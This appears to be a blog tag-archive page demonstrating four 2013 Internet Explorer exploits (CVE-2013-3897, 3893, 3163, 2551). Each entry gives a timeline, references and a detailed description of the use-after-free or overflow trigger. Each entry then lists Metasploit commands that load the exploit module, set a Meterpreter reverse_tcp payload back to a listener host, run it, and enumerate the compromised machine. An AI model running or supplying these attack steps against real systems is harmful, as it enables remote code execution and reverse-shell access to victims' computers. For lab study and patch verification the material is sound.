Tag Archives: Internet Explorer

CVE-2013-3897 Microsoft Internet Explorer CDisplayPointer Use-After-Free

Exploits, Metasploit, , , , ,

Timeline :

Vulnerability discovered exploited in the wild the 2013-09
Patched by the vendor via MS13-080 the 2013-10-08
Metasploit PoC provided the 2013-10-12

PoC provided by :

Unknown
sinn3r

Reference(s) :

CVE-2013-3897
MS13-080

Affected version(s) :

Internet Explorer 6, 7, 8, 9, 10 and 11.

Tested on :

with Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of a “onpropertychange” event handler. To set up the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called “onselect”. The “onselect” event will allow us to set up for the actual event handler we want to abuse – the “onpropertychange” event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in “onselect”, this will trigger “onpropertychange”. During “onpropertychange” event handling, a free of the CDisplayPointer object can be forced by using an “Unslect” (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer’s position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary code execution under the context of the user.

Commands :

use exploit/windows/browser/ms13_080_cdisplaypointer
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-3893 Microsoft Internet Explorer SetMouseCapture UAF

Exploits, Metasploit, , , , , ,

Timeline :

Vulnerability discovered exploited in the wild the 2013-08-23
Microsoft publish Microsoft Security Advisory 288750 the 2014-09-17
Microsoft publish a Fix it workaround the 2013-09-17
Metasploit PoC provided the 2013-09-30
Patched by the vendor via MS13-080 the 2013-10-08

PoC provided by :

Unknown
sinn3r
Rich Lundeen

Reference(s) :

CVE-2013-3893
MS13-080
MSA-2887505

Affected version(s) :

Internet Explorer 6, 7, 8, 9, 10 and 11.

Tested on :

with Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker first can setup two elements, where the second is the child of the first, and then setup a onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element, one for the child. When the setCapture() call for the child element is called, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees up a 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference will still be kept and pass on to more functions, eventually this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary code execution) when this function attempts to use this reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack.

Commands :

use exploit/windows/browser/ie_setmousecapture_uaf
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-3163 Microsoft Internet Explorer CAnchorElement UAF

Exploits, Metasploit, , , ,

Timeline :

Vulnerability discovered exploited in targeted attacks
Vulnerability reported to the vendor by Jose Antonio Vazquez Gonzalez via VeriSign iDefense Labs
Patched by the vendor the 2013-07-09
Metasploit PoC provided the 2013-09-09

PoC provided by :

Jose Antonio Vazquez Gonzalez
Orange Tsai
Peter Vreugdenhil
sinn3r

Reference(s) :

CVE-2013-3163
OSVDB-94981
MS13-055

Affected version(s) :

All versions of Internet Explorer 8 on Windows.

Tested on :

with Internet Explorer 8 on Windows 7 SP1

Description :

In IE8 standards mode, it’s possible to cause a use-after-free condition by first creating an illogical table tree, where a CPhraseElement comes after CTableRow, with the final node being a sub table element. When the CPhraseElement’s outer content is reset by using either outerText or outerHTML through an event handler, this triggers a free of its child element (in this case, a CAnchorElement, but some other objects apply too), but a reference is still kept in function SRunPointer::SpanQualifier. This function will then pass on the invalid reference to the next functions, eventually used in mshtml!CElement::Doc when it’s trying to make a call to the object’s SecurityContext virtual function at offset +0x70, which results a crash. An attacker can take advantage of this by first creating an CAnchorElement object, let it free, and then replace the freed memory with another fake object. Successfully doing so may allow arbitrary code execution under the context of the user. This bug is specific to Internet Explorer 8 only. It was originally discovered by Jose Antonio Vazquez Gonzalez and reported to iDefense, but was discovered again by Orange Tsai at Hitcon 2013.

Commands :

use exploit/windows/browser/ms13_055_canchor
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

sysinfo

CVE-2013-2551 MS13-037 Internet Explorer Vulnerability Metasploit Demo

Exploits, Metasploit, , , ,

Timeline :

Vulnerability exploited during Pwn2Own 2013 by VUPEN the 2013-03-07
Vulnerability corrected by vendor the 2013-05-14
Details on the vulnerability provided by VUPEN the 2013-05-22
Metasploit PoC provided the 2013-06-12

PoC provided by :

Nicolas Joly
4B5F5F4B
juan vazquez

Reference(s) :

CVE-2013-2551
OSVDB-91197
MS13-037
BID-58570
VUPEN Advanced Exploitation of Internet Explorer 10 / Windows 8 Overflow (Pwn2Own 2013)

Affected version(s) :

Microsoft Internet Explorer 6 through 10

Tested on Windows 7 Integral with :

Internet Explorer 8
ntdll.dll

Description :

This module exploits an integer overflow vulnerability on Internet Explorer. The vulnerability exists in the handling of the dashstyle.array length for vml shapes on the vgx.dll module. This module has been tested successfully on Windows 7 SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target to use an info leak to disclose the ntdll.dll base address is provided. This target requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1 installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001).

Commands :

use exploit/windows/browser/ms13_037_svg_dashstyle
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo